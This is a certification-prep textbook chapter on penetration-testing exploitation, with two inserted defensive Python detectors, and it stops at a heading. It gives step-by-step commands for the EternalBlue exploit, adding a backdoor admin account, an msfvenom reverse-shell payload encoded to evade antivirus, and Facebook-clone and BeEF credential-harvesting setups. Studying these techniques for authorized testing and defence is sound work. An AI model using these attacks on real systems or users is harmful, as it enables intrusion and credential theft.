Exploiting Systems using Metasploit PDF
Summary
This chapter explores system exploitation techniques, focusing on the use of Metasploit for exploiting vulnerabilities like MS17-010 EternalBlue SMB. It covers various exploit types and payload options. The document includes detailed instructions on searching for and utilizing specific exploits.
EXAM OBJECTIVES
»» Using Metasploit to exploit systems
»» Understanding social engineering and attacks on physical security
»» Learning common attack techniques
»» Exploiting network-based and local-host vulnerabilities

Chapter 5
Exploiting Systems

After you collect a list of vulnerabilities on your target systems, the third phase of the penetration testing process is to exploit, or take advantage of, those vulnerabilities to gain access to the target systems. For the CompTIA PenTest+ certification exam, you should be familiar with the common types of exploits performed to gain access to systems, including attack techniques such as Server Message Block (SMB), pass the hash, password cracking, social engineering, man-in-the-middle (MiTM), and attacks on physical security.

In this chapter, you start the third phase of the penetration testing process by looking at the common techniques used to exploit systems, including how to use Metasploit to exploit vulnerabilities and how to exploit network-based and local-host vulnerabilities.

Exploiting Systems with Metasploit

After performing a vulnerability scan on the target systems, you should have a list of the vulnerabilities that can be exploited to gain access to those systems. One of the popular exploit tools used to take advantage of a vulnerability is the Metasploit Framework (www.metasploit.com). Metasploit is preinstalled on Kali Linux, but you can also download it for other platforms if you are not using Kali Linux. In this section, we’ll walk through how to use Metasploit to exploit a vulnerability exposed by our vulnerability scanner.

CHAPTER 5 Exploiting Systems 155

As you can see from the vulnerability scan results shown in Figure 5-1, a critical vulnerability was found that is exploitable with Metasploit — the MS17-010 EternalBlue SMB exploit.

FIGURE 5-1: Identifying the tool to use to exploit a vulnerability.
Focus on the critical vulnerabilities first, as these are the vulnerabilities most likely to give you access to the system if exploited.

Starting Metasploit

To use Metasploit, you first need to start a terminal session in Kali Linux and then run the msfconsole command. It will take a few minutes to load, and when it does, you will see a screen similar to the one shown in Figure 5-2. Once Metasploit launches, you will see a logo with summary information that lists the number of exploits that exist within Metasploit. You will also notice that you are at the Metasploit prompt (msf >), where you can type Metasploit commands. If you ever want to see a list of commands that you can use, type ? at the prompt and press Enter. This brings up the Help screen that shows a list of commands and their meanings.

156 PART 2 Attacks and Exploits

FIGURE 5-2: Metasploit has a number of preinstalled exploits.

Searching for an exploit

After loading Metasploit, the next step is to search for an exploit that can be used to take advantage of the vulnerability. This is where you use the exploit information from the vulnerability scan report. In my example, remember that the exploit I can use is the MS17-010 EternalBlue SMB exploit. I can either search on MS17-010 or I can search on the term EternalBlue as follows:

msf > search EternalBlue

Looking at Figure 5-3, notice that an exploit with the path of exploit/windows/smb/ms17_010_eternalblue has been found. The path is a logical path to help you navigate all the exploits within Metasploit. In this example, you can see that it is an exploit for Windows SMB called ms17_010_eternalblue.

FIGURE 5-3: Searching for an exploit.

Keep in mind that we could have also searched on the Microsoft security bulletin ID of MS17-010 with the following command:

msf > search MS17-010

The point here is that the results from your vulnerability scan are helping you determine what exploit to use from the Metasploit Framework.
Also notice that with each exploit there is a description column and a rank column. The rank column indicates the usual success rate of the exploit. Table 5-1 displays the rankings and their meanings.

TABLE 5-1 Metasploit Exploit Rankings

Rank       Meaning
Manual     The exploit is unstable or difficult to perform, as much configuration must be performed by the user.
Low        The exploit is near impossible to perform.
Average    The exploit is unreliable or difficult to perform.
Normal     The exploit is typically reliable and cannot automatically detect the target.
Good       The exploit has a default target configured.
Great      The exploit has a default target and can automatically detect the target to use.
Excellent  The exploit will never crash the service being exploited.

Look for exploits that have a rank of good, great, or excellent.

Using an exploit

Each exploit is a separate module in Metasploit that you can use. Once you have located an exploit with the search command, make a note of the path. You are then ready to use the exploit. In my example, I want to use the EternalBlue exploit (exploit/windows/smb/ms17_010_eternalblue) against my Windows 7 target of 192.168.67.135. To do this, I first need to select the exploit module to use with the use command:

> use exploit/windows/smb/ms17_010_eternalblue

Once you run this command, notice that your prompt changes to the exploit prompt, which also shows the module being used (see Figure 5-4).

FIGURE 5-4: Selecting an exploit.

After selecting the exploit, you then must look at the options to see which options need to be filled in (required) before executing the exploit. To see a list of options, run the show options command, as shown in Figure 5-5.

FIGURE 5-5: Using the show options command to see a list of options.

Looking at Figure 5-5, you can see that the RHOST option (remote host) is required and currently does not have a value associated with it.
The RHOST option is the setting for the IP address of the target system you are trying to exploit. In my example, I need to set it to 192.168.67.135 (the Windows 7 client). Before we set the RHOST option, notice at the bottom of the output you can see the target platforms this exploit works on. Note in this example, the exploit works on Windows 7 and Server 2008 R2.

To set an option, run the set command followed by the option name and its value. You can then view the options to verify that the setting was taken correctly (see Figure 5-6). For example:

> set RHOST 192.168.67.135
> show options

FIGURE 5-6: Verifying your settings.

In this example, RHOST is the only required setting before executing the exploit.

Running the exploit

After configuring all required settings, you are now ready to run the exploit. To run the exploit, you simply run the exploit command, as shown in Figure 5-7. Note in the figure that the EternalBlue exploit is run successfully; the output of WIN appears at the bottom of the screen. Also notice that following the WIN text at the bottom of the screen is a Windows command prompt, as shown in Figure 5-8. This is the command prompt of the target system — you have administrative capabilities of the target!

At this point you can use any Windows commands to manipulate the compromised system. For example, you can use the following commands to view the list of user accounts on the target system and create your own administrative account:

net user
net user hacked Pa$$w0rd /add
net localgroup administrators hacked /add

FIGURE 5-7: Running the exploit.

FIGURE 5-8: You have shell access to the system.

You can run the net user command again to verify that the new user account was created. To exit, press CTRL+C and then choose y when asked if you wish to abort the session.
Setting the payload

Once you have identified the vulnerability in a system and exploited that vulnerability to gain access to that system, it is time to execute the payload. The payload is the code to execute on the target once the system is exploited — it is the action you wish to perform when the exploit is delivered to the target.

To help illustrate the relationship between the exploit and the payload, think of a missile. A missile is made up of the rocket portion and the warhead. The rocket portion of the missile is the delivery mechanism (the exploit) for the warhead (the payload), which is the component designed to do the damage. Without one or the other the missile would be useless. The same is true for an exploit and payload.

Metasploit uses several types of payloads:

»» Bind shell: This payload sets up a listener on the target machine for the attacker to connect to. When the attacker connects to the listener, the payload code executes, resulting in shell access to the system.
»» Reverse bind shell: When this payload executes on the target system, the payload code makes a connection back to the attacker’s system via an open listening port on the attacker’s system.
»» Meterpreter shell: This payload provides an interactive shell, known as a meterpreter session, where there are a number of built-in commands that allow you to discover information about the compromised system.

These three payloads are the most common; there are many others.
If you wish to see all of the payloads, run the show payloads command as follows (I have cut the output to keep it brief):

msf exploit(ms17_010_eternalblue) > show payloads
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/bind_tcp_uuid
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_ipv6_tcp
windows/x64/shell/bind_ipv6_tcp_uuid
windows/x64/powershell_bind_tcp

You then select a payload with the set payload command. Assuming you have already selected the exploit and set the RHOST option as discussed earlier, you can then set the payload with the following command and run the exploit:

set payload windows/x64/meterpreter/reverse_tcp
exploit
(output cut for briefness)
[*] Sending stage (205379 bytes) to 192.168.67.135
[*] Meterpreter session 3 opened (192.168.67.131:4444 -> 192.168.67.135:49188) at 2020-04-12 12:54:52 -0400
[+] 192.168.67.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.67.135:445 - =-=-=-=-=-WIN-=-=-=-=-=-=-=-=
[+] 192.168.67.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

Notice that because a different payload was used, the end result of the exploit is different (even though I am using the same EternalBlue exploit). This time a meterpreter session was obtained on the target (note the meterpreter prompt) where I can use a number of commands to turn on the target’s webcam, take a screenshot, grab the password hashes from the target’s system, and so on. You learn about the post-exploitation commands available in meterpreter in Chapter 8.

After changing the payload, it is a good idea to use the show options command to see if there are any payload options that need to be set. If you ever get an error when you run the exploit command, use show options to see if a mandatory option is missing.
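The session line above shows the direction a reverse_tcp payload uses: the exploited host (192.168.67.135) opens the connection to the handler's LPORT (4444 on 192.168.67.131), so on the network the victim is the client. The following Python script is an added, defender-side example and is not from the book or from Metasploit: it parses a few constructed connection-log lines and flags TCP connections that an internal host initiates either to a known handler port or to an external host on a port outside an expected egress allowlist. The log format, the internal subnet list and the allowlist are assumptions; only port 4444 comes from the page.

```python
"""Flag connection records that look like a reverse-TCP payload calling home.

Direction, as the payload section describes it: the compromised host opens
the connection to the listener on LPORT, so the victim is the TCP client.
"""
import ipaddress
from dataclasses import dataclass

# Assumptions, not from the page: which address ranges count as "inside",
# and which destination ports ordinary workstation egress is expected to use.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EXPECTED_EGRESS_PORTS = {25, 53, 80, 123, 443, 587, 993}
# 4444 is the LPORT used by the page's handler; extend with ports your own
# environment has seen abused.
KNOWN_HANDLER_PORTS = {4444}

# Constructed sample log: "timestamp src sport dst dport proto".
# Line 1 mirrors the Meterpreter session line in the text
# (192.168.67.131:4444 -> 192.168.67.135:49188) as seen from the victim side.
SAMPLE_LOG = """
# ts                  src             sport  dst             dport proto
2020-04-12T12:54:52   192.168.67.135  49188  192.168.67.131  4444  tcp
2020-04-12T12:54:58   192.168.67.135  49190  93.184.216.34   443   tcp
2020-04-12T12:55:02   192.168.67.140  51000  203.0.113.10    4444  tcp
2020-04-12T12:55:07   192.168.67.140  51001  203.0.113.10    8443  tcp
2020-04-12T12:55:09   192.168.67.140  51002  192.168.67.1    53    udp
2020-04-12T12:55:10   198.51.100.7    443    192.168.67.135  49191 tcp
"""


@dataclass
class Conn:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_conn_log(text):
    """Parse whitespace-separated log lines into Conn records; skip comments."""
    conns = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, sport, dst, dport, proto = line.split()
        conns.append(Conn(ts, src, int(sport), dst, int(dport), proto.lower()))
    return conns


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_reverse_connections(conns):
    """Return (Conn, reason) pairs for TCP connections an internal host initiates
    either to a known handler port (any destination, since the lab handler in
    the text sits on the same LAN) or to an external host on an unexpected port."""
    hits = []
    for c in conns:
        if c.proto != "tcp" or not is_internal(c.src):
            continue
        if c.dport in KNOWN_HANDLER_PORTS:
            hits.append((c, f"{c.src} -> {c.dst}:{c.dport} known handler port"))
        elif not is_internal(c.dst) and c.dport not in EXPECTED_EGRESS_PORTS:
            hits.append((c, f"{c.src} -> {c.dst}:{c.dport} unexpected egress port"))
    return hits


if __name__ == "__main__":
    for conn, reason in flag_reverse_connections(parse_conn_log(SAMPLE_LOG)):
        print(conn.ts, reason)
```

Run as-is, the script reports three of the six constructed records: the lab session to port 4444, an outbound connection to an external host on 4444, and one to an external host on 8443; the normal HTTPS and DNS traffic and the inbound flow from 198.51.100.7 are left alone. A bind-shell payload would not appear here at all, because with a bind shell the attacker is the client, which is why egress monitoring alone is not a complete answer to either payload type.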
Using msfvenom

Msfvenom is a payload generator used to generate and output the shell codes available in Metasploit. One example of using msfvenom in Kali Linux is to use it to create a malicious program that will connect the victim’s system to your pentest system (a reverse shell), enabling you to obtain a meterpreter session with the target. This exploit is an example of a program that you can create and put on a dropped USB flash drive to see if anyone picks up the USB stick and runs the unknown code. Once the meterpreter session is obtained, you can then download files from the victim’s computer, obtain password hashes, use the webcam, and run many other post-exploitation commands.

The following steps can be used to exploit a system with malicious code you generate with msfvenom.

Phase 1: Create the malicious program

1. On your Kali system, run ifconfig in a terminal session and record the IP address: _____________________.

2. In the terminal session, type the following command to create a malicious program that obtains a meterpreter session with the victim using a reverse TCP shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 --platform win -e x86/shikata_ga_nai -f exe -i 15 > /root/Desktop/ClarkeMalware.exe

Where:
-p specifies the payload you wish to use.
LHOST specifies the IP address with which to obtain a reverse connection. This will be the IP address of the Kali system that will run a listener waiting for the program to connect.
LPORT specifies the port to connect to on the Kali system.
-a x86 specifies the architecture of x86 for the created code.
--platform win specifies the code generated is for a Windows system.
-e specifies the encoder to use.
-f exe specifies the format of the generated code is to be an .exe file.
-i 15 specifies to encode the program 15 times as an attempt to hide the malicious code from antivirus software.
> specifies the filename to generate.
Phase 2: Set up a listener on your system

Before sending or copying the file to the intended victim, you will need to set up a listener on your Kali Linux system.

3. Run the following commands on Kali Linux to set up a listener:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
exploit

Notice that your system is now listening for a connection (see Figure 5-9). Once someone runs the malware program, that person’s system will connect to this listener, giving you a meterpreter session on that system.

FIGURE 5-9: Setting up a reverse TCP listener.

Phase 3: Trick users into running the program

The next step is to either trick the users into running the program by emailing it to them in a social engineering attack, or putting the program on a USB flash drive for users to find and insert into their own systems. Keep in mind that up-to-date antivirus software running on a user’s system will most likely block the program.

4. Copy or email the malware to the target system.

When the user runs the program, the user’s system will connect to your Kali Linux system (the pentester system). Once connected, you will have a meterpreter shell to do as you please with the user’s system.

5. To see an example of a meterpreter command you can use, run the screenshot command to take a screenshot of the user’s system (see Figure 5-10). You learn more about meterpreter commands in Chapter 8.

FIGURE 5-10: Taking a screenshot of the victim’s system.

Using exploit resources

Learning about vulnerabilities and exploits against systems can be a time-consuming task; therefore, knowing how to research for vulnerabilities against a specific product effectively is an important skill for a penetration tester.
Following are common websites used by penetration testers to locate exploits against different products:

»» Exploit-DB exploit database (DB): The Exploit-DB exploit database is a popular source of information on exploits against vulnerable software. The exploit database is found at www.exploit-db.com. At the site you can search for a particular product and then read about and download exploits against the product.
»» Packet Storm: Another common website that includes a listing of exploits against different software is Packet Storm, located at packetstormsecurity.com. In the top-right corner of the main screen you can search for a product and then get a listing of exploits for that product.

Understanding Social Engineering

Social engineering from a security standpoint refers to the deliberate use of deception to try to trick a user into compromising system security through social contact such as an email message, a text message, or a phone call. Social engineering attacks are a common way to test the effectiveness of a company’s security education program. If the engagement rules and scope of the penetration test support social engineering attacks, you should plan for them in the penetration test.

There are different types of social engineering attacks such as phishing, shoulder surfing, and USB key drop, among others. Let’s take a look at the different types of social engineering.

Email phishing

Phishing is a type of social engineering attack that occurs when the hacker sends an email message to a user with the hope that the user will click on hyperlinks within the message. These hyperlinks link to malicious websites that collect information from the user. For example, a hacker may send an email message that appears to be from the user’s banking institution, and links within the message take the user to a site that looks like the bank’s site.
Because the site looks familiar to the user, the user may then feel comfortable supplying account information, not knowing it is a fake bank site. All the time this is going on, the hacker is collecting the information that is typed into the fake site.

With a regular phishing attack, the hacker sends the email message to a pool of email addresses the hacker was able to discover without really any thought to who the email goes to. When you do a penetration test, you can do the same: Collect a bunch of email addresses for the target organization and then email all the addresses to see if someone goes to the fake site.

Phishing attacks occur in the following different forms:

»» Spear phishing: Refers to a phishing attack that targets a specific person.
»» SMS phishing: Short message service (SMS) phishing, also known as smishing, is a phishing attack conducted through text messaging instead of email.
»» Vishing: Phishing attacks that use voice over the phone instead of email.
»» Whaling: Refers to a phishing attack that targets the “big fish” of a company, such as the CEO.

For the PenTest+ certification exam, remember the different forms of phishing attacks. Also remember that the rules of engagement should identify whether social engineering attacks are allowed in the penetration test.

USB key drop

Another type of social engineering attack common with penetration testing is a USB key drop. With a USB key drop, the pentester will leave USB flash drives all over the organization in hopes that an employee picks one up and plugs it into a computer to see what is on the drive. As a penetration tester, you will configure a script or application to automatically run when the drive is connected that will send an email message to you that includes information such as the IP address of the system the drive is connected to. With a USB key drop, you are able to find out the security awareness level of the organization.
If you set out ten USB drives and you get eight email messages, it is obvious that the employees do not understand that they should not connect untrusted devices to their computers.

Another benefit of using a USB key drop with your penetration test is that you can use it to collect information such as IP addresses of hosts on the network. You can then use these IP addresses as IP addresses of potential targets.

Other forms of social engineering

In addition to the types of social engineering attacks discussed in the previous sections, social engineering attacks may also take the form of impersonation, interrogation, and a watering hole attack. For example, a hacker (or pentester) could impersonate an administrator to try to trick users into compromising security (for example, maybe the hacker convinces users to change their passwords). If social engineering attacks are in the scope of the assessment, you could try calling or emailing employees and impersonating the administrator to trick the employees into compromising security. You could also impersonate a user who contacts the administrator and see if the administrator can be tricked into helping you access the system.

Interrogation is specifically called out in the objectives of the CompTIA PenTest+ certification exam as another form of social engineering attack. When interviewing or interrogating people, a number of physical reactions to questions can be used to identify topic areas that should lead to more questioning. For example, when people start to feel stress, they usually start to touch their face a lot — watch for these visual cues during interviews and interrogation.

Another form of social engineering attack is a watering hole attack. A watering hole attack is when a hacker compromises a popular website and then places code on the site that will execute in the browser of anyone who visits the site.
That code then compromises the visitor to the site and gives the hacker access to the visitor.

The key point to remember about social engineering is that your goal is elicitation. You would like to elicit a response or reaction from employees that causes them to compromise security. You could also use a business email compromise (BEC) attack where you gain access to an employee’s corporate email account and use that to send messages to other employees in the company.

Methods of influence

What are some of the methods of influence used in social engineering attacks that cause the attack to be successful? A common technique is to evoke a sense of urgency for the end user to click the link in an email message from the hacker. When social engineering attacks are sent out, the hacker usually stresses a sense of urgency to act now as a method to get the user to click the link or run the application without thinking about it too much.

Following is a list of influence techniques often used by the hacker or penetration tester to get a user to compromise security:

»» Authority: The hacker or penetration tester pretends to be a person of authority requesting that the user perform an action. This action, such as clicking a link in an email message or changing a password, is enough to help the hacker gain access to the system.
»» Scarcity: The communication from the hacker or pentester typically implies a shortage in time or the chance of a prize in order to trick the person into acting now.
»» Social proof: The hacker or pentester relies on the concept that if users see others doing something, they feel it is the correct thing to do, so they do it too. For example, if everyone is downloading a certain program, a user may feel that it must be safe if everyone else is doing it.
»» Urgency: The hacker or pentester evokes a sense of the importance of a swift action in order to get users to act on the request.
»» Likeness: People respond well to people they like and are by nature typically willing to help someone in need. If the attacker can appear to be in need and has a friendly demeanor, victims may let their guard down and be more likely to respond to the social engineering attack.
»» Fear: The hacker or pentester uses fear to elicit a response from the user. For example, a hacker sends an email message telling the user that a security vulnerability was found in the system that gives someone full access to the system, and to remove this vulnerability, the user must install a “patch.” In reality the patch is the malicious software that allows the attacker into the system.

Using SET to perform an attack

The Social-Engineer Toolkit (SET) is a tool available in Kali Linux that allows you to perform a number of social engineering exploits to gain access to a victim’s system or compromise the victim’s password. Let’s take a look at an example that uses SET to clone a popular website. When you trick users into visiting a cloned site, users think the clone is the real site and may enter their logon credentials into the site for SET to capture.

Phase 1: Set up the cloned site

1. On your Kali system, run ifconfig in a terminal session and record the IP address: _____________________.

2. In the terminal session, run the setoolkit command to launch SET. SET will display the terms of use.

3. Choose y to agree to the terms and go to the SET main menu screen.

4. Type 1 to perform a social engineering attack and press Enter. With SET, you can perform many different types of attacks.

5. Type 2 for Website Attack Vectors and press Enter (see Figure 5-11).

FIGURE 5-11: Using SET to clone a website.

6. Type 3 to perform a credential harvester attack and then press Enter.

7. Type 2 to choose Site Cloner and press Enter. Site Cloner is used to copy a real website in order to create a fake site that tricks users into entering their passwords.
Once you press Enter, you are asked for the IP address for the POST back in Harvester/Tabnabbing. This is the IP address of where you want the site to be copied (keep in mind we haven’t told SET the website to copy yet).

8. Type the IP address of your Kali Linux and press Enter. You are asked which website to clone.

9. We will clone the Facebook website for this example, so type https://www.facebook.com. The Facebook site is copied to your Kali system and set up to listen on port 80.

10. To test the site out, launch a web browser and type http://. You should see what appears to be the Facebook website.

Phase 2: Trick the victim into visiting the fake site

Now that you have a fake site set up that looks like Facebook, you next want to trick users into visiting that site. One method of doing this is to send an email to the users with a link that displays the display text of Facebook, but the URL goes to your fake website.

11. While SET is running, have users navigate to your fake website and log on.

Phase 3: Check the harvester file for passwords

As users are attempting to log on to the site, SET is logging the usernames and passwords. You can have a report generated by following these steps:

12. Switch back to the terminal running SET. You should see some activity was generated in SET.

13. Press CTRL+C to generate a report. Note that the reports are stored in the /root/.set/reports folder. There is an HTML and an XML report.

14. To check out the HTML report, click the folder icon in the Kali toolbar and then choose Home on the left.

15. Note that by default Kali does not show hidden folders, so choose the Options button to the left of the minimize button in the folder window.

16. Choose the Show Hidden Files check box at the bottom. Now you can see the .set folder.

17. Navigate to .set/Reports.

18. Double-click the HTML report to view the results including any email addresses and passwords typed into the fake site (see Figure 5-12).
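What the Site Cloner procedure produces is a brand-name login page served over plain HTTP from a bare IP address, whose password form posts back to that same address; the BeEF walkthrough later in this chapter produces the complementary pattern, a legitimate page that loads a script from a host other than its own. The following Python script is an added, defender-side example and is not from the book, SET or BeEF: given a page URL and its HTML, it reports both traits. All three sample pages are constructed for the example (the hook URL is a placeholder, not BeEF's real one), and the finding codes are this script's own.

```python
"""Audit a fetched HTML page for the traits a cloned login page and a hooked
page share: a credential form posting somewhere untrustworthy, and a
<script src> pulled from a host other than the page's own."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample 1: a cloned login page served from the Kali box in the
# text (192.168.67.131) over plain HTTP, as the visiting browser sees it.
CLONED_LOGIN_URL = "http://192.168.67.131/"
CLONED_LOGIN_HTML = """
<html><head><title>Log in to Facebook</title></head><body>
<form method="post" action="http://192.168.67.131/index.html">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" value="Log In">
</form></body></html>
"""

# Constructed sample 2: the company page from the BeEF walkthrough with a
# hook script referenced from an IP-literal host (placeholder hook URL).
HOOKED_URL = "https://www.example.com/index.html"
HOOKED_HTML = """
<html><head><title>Welcome to Company Website</title>
<script src="http://192.168.67.131:3000/hook.js"></script></head>
<body><p>Welcome to our company website.</p></body></html>
"""

# Constructed sample 3: a benign login page, same-origin form and script.
CLEAN_URL = "https://www.example.com/login"
CLEAN_HTML = """
<html><head><script src="/static/app.js"></script></head><body>
<form method="post" action="/session">
  <input type="password" name="pw"><input type="submit">
</form></body></html>
"""


class _Collector(HTMLParser):
    """Records each <form> (noting password inputs) and every <script src>."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_page(page_url, html):
    """Return sorted finding codes for the page at page_url whose body is html."""
    page = urlparse(page_url)
    page_host = page.hostname or ""
    findings = set()

    # Page-level: a login page reached over plain HTTP on a bare IP.
    if page.scheme != "https":
        findings.add("page-not-https")
    if _is_ip_literal(page_host):
        findings.add("page-host-is-ip-literal")

    collector = _Collector()
    collector.feed(html)

    # Credential forms: where does the password actually go?
    for form in collector.forms:
        if not form["has_password"]:
            continue
        target = urlparse(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            findings.add("password-form-not-https")
        if target.hostname and target.hostname != page_host:
            findings.add(f"password-form-offorigin:{target.hostname}")

    # Scripts: anything loaded from another host runs with this page's privileges.
    for src in collector.scripts:
        s = urlparse(urljoin(page_url, src))
        host = s.hostname or ""
        if host and host != page_host:
            kind = "ip-literal" if _is_ip_literal(host) else "third-party"
            findings.add(f"external-script-{kind}:{host}")
        if page.scheme == "https" and s.scheme != "https":
            findings.add("mixed-content-script")

    return sorted(findings)


if __name__ == "__main__":
    for url, body in ((CLONED_LOGIN_URL, CLONED_LOGIN_HTML),
                      (HOOKED_URL, HOOKED_HTML), (CLEAN_URL, CLEAN_HTML)):
        print(url, audit_page(url, body) or "no findings")
```

The cloned page trips the page-level checks and the insecure form check; the hooked page trips the external-script and mixed-content checks; the benign page reports nothing. A third-party script host is reported at lower confidence than an IP literal because legitimate sites load scripts from CDNs, which is also why a Content-Security-Policy that names the permitted script hosts is the durable fix for the hook pattern.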
FIGURE 5-12: Viewing credentials collected using SET. Using BeEF to perform an attack The Browser Exploitation Framework (BeEF) is an exploitation tool that focuses on exploiting a victim’s web browser. BeEF can be used to generate malicious code CHAPTER 5 Exploiting Systems 171 to embed into a web page. When a user visits that web page, the code establishes a connection to the user’s system, giving you control of that system using the BeEF console. Once you’ve established control of the user’s system, you can then perform such post-exploitation tasks as starting the user’s webcam or recording the user’s keystrokes. Let’s walk through an example of using BeEF on Kali Linux. Phase 1: Start BeEF 1. On your Kali system, run ifconfig in a terminal session and record the IP address: _____________________. 2. To run BeEF on your Kali system, type the following commands: cd /usr/share/beef-xss./beef Notice that BeEF starts after a short time and displays the interfaces BeEF is running on. For the interface that has the IP address you recorded earlier, note the URLs of the Hook and the UI: Hook: _________________________________________ UI: ___________________________________________ The Hook is the malicious code you will call from a web page; the UI is the administrative console used by the attacker to control the victim’s system (see Figure 5-13). 3. On your Kali system, launch a web browser and navigate to the user interface (UI) URL you noted. 4. Log on with the username of beef and the password of beef. Notice that there are no online browsers listed on the left side of the screen. FIGURE 5-13: Launching BeEF and the hook URL. 172 PART 2 Attacks and Exploits Phase 2: Create the malicious site 5. 
On your Kali system, launch a new terminal window (leave BeEF running in its own terminal) and type the following to start an Apache web server: service apache2 start After the Apache web server is started, use the folder list to navigate the file system and locate the web page we wish to modify. 6. Navigate to Other Locations ➪ Computer ➪ | var ➪ www ➪ html. 7. Right-click index.html and choose Open With Other Application. 8. Choose View All Applications and then highlight Text Editor. 9. Choose Select to open the web page in a text editor. 10. Once the file has opened, press Ctrl+A to highlight all of the contents and then press Del on the keyboard to delete the contents. 11. Type the following text in the file to create a web page: Welcome to Company Website Welcome to our company website. We have a number of services that can help you. 12. Modify the section to include a reference to the hook URL: The hook URL references the malicious JavaScript code we wish to execute within the web page. 13. Save and close the file. CHAPTER 5 Exploiting Systems 173 Phase 3: Attack client systems For the browser exploitation to work, you next need to trick the user into visiting your website. You can use social engineering attacks such as sending an email with the link, sending a text message with the link, or placing a link on another web page. 14. From a different system, navigate to http:// to surf the website (normally you would trick the user into clicking a link to go to this site). You should see the company website. 15. Switch back to your Kali Linux system. 16. While the user is connected to the company site, go back to the BeEF UI site and you should see the client connected on the left side of your screen (if not, refresh the page). 17. Click the Commands tab to see a list of commands you can send to the compromised system. In the Module Tree you can see all the different commands and exploits you can send to the visitor. 18. 
Expand Social Engineering and then select Google Phishing (see Figure 5-14). FIGURE 5-14: Using the BeEF UI to execute exploits. 19. Click the Execute button that appears on the right side of the screen. This causes a Google logon page to appear on the victim’s system. When the user logs on, the victim’s username and password are logged into the BeEF UI console. Note that if you want the user to be redirected to a specific web page after the user attempts to log on, you could put the URL in an XSS hook URL field. 174 PART 2 Attacks and Exploits 20. Choose the command from the Module Results screen to see the user- name and password the user entered to log on to Google (see Figure 5-15). FIGURE 5-15: Looking at the captured logon information. Google Phishing is a quick example of a command in BeEF. As you can see when you browse the list, there are many different exploits you can use to take over the victim’s system including gaining a meterpreter session. Call spoofing tools Call spoofing occurs when the hacker performing a social engineering attack over the phone alters the phone number that displays in a victim’s caller ID. This helps the attacker avoid being blocked by the victim’s phone. A number of techniques and tools can be used to spoof calls, such as using a VoIP service or by using prod- ucts such as SpoofCard. After purchasing SpoofCard, you then call a 1-800 number and supply your PIN number along with the number you would like to display in the victim’s caller ID and the victim’s phone number to call. Pretexting Pretexting is an important part of social engineering attacks. It refers to the fake scenario or “pretext” attackers present to potential victims in order to complete the attack. For example, attackers may make a call or send an email to a potential victim to say that they are from the fraud department at the victim’s bank and that they have noticed suspicious activity related to the victim’s account. 
Attackers would then ask the potential victim to click a link to log into the victim’s bank account to verify the transactions. The fact that the attackers state that they are from the fraud department and that they have noticed suspicious activity ensures that potential victims see the urgency and may not think twice about clicking the link that takes them to a fake site where attackers collect their login information. The pretext (scenario) is used to trick users into compromising security or divulging sensitive information.

Looking at Attacks on Physical Security

Physical security plays an important role in any organization’s security program and defensive posture. Physical security involves controlling who has physical access to the facility, the servers, network equipment, and end-user devices.

Types of physical security controls

Organizations use a number of physical security controls to regulate who gains access to the facility or what areas in the facility they gain access to. Highly secured environments control access to the facility by having high fencing around the perimeter of the property with only one or two entrances used to enter or leave the facility. These entrances have gates and security guards that control who gains access to the building. In highly secured locations, the guard ensures that everyone who enters has an ID badge. Visitors typically need to get a guest badge and be escorted by the employee who is hosting them at the facility.

Once inside the building, doors are locked to control who can gain access to different areas of the building. Companies can use traditional locks and keys, combination locks, or electronic locking systems where a card needs to be swiped in order to gain access to that area of the building.

Exploiting physical security

A number of methods may be used to bypass physical security controls.
As a penetration tester, you may need to test these physical controls and see if you can bypass the security to gain access to areas of the building you should not have access to.

Piggybacking/tailgating

To compromise physical security as a penetration tester, you can try to follow an employee who does have access into a restricted area of the building after the employee unlocks the door. There are two terms for this type of physical security attack:

»» Piggybacking: Piggybacking occurs when employees use their swipe card (key) to unlock a door and then allow the person behind them into the locked area as well without making that person swipe a card. This exploits people’s natural tendency to be kind and hold the door open for the next person. As the penetration tester, you want to test to see if you can piggyback into the facility, as this identifies a huge security concern. Note that with piggybacking, people are aware that they are allowing you in.

»» Tailgating: Tailgating is similar to piggybacking with the exception that employees have no idea you slipped through the door after they had unlocked it.

For the PenTest+ certification exam, remember the difference between piggybacking and tailgating. Piggybacking involves the employee knowingly allowing someone to gain access to a restricted area, while with tailgating, the employee did not know someone was able to gain access after the employee unlocked the door.

A great countermeasure to implement to prevent piggybacking and tailgating is a mantrap. A mantrap is an area between two locked doors. The second door does not unlock until the first door locks. This ensures employees know who is with them at all times. A revolving door is another type of mantrap that helps ensure no one else slips through the door while an employee is going through.

Dumpster diving

A method to discover sensitive information about a company and its employees is to dumpster dive.
With dumpster diving, the attacker goes through the garbage of the intended victim trying to locate information that could help in an attack. It is important to shred all sensitive documents so that the sensitive information cannot be discovered via a dumpster diving attack.

Shoulder surfing

Shoulder surfing is a traditional type of attack in which the hacker watches over the shoulder of the user to see what the user is typing on the computer or mobile device in order to obtain information.

Badge cloning

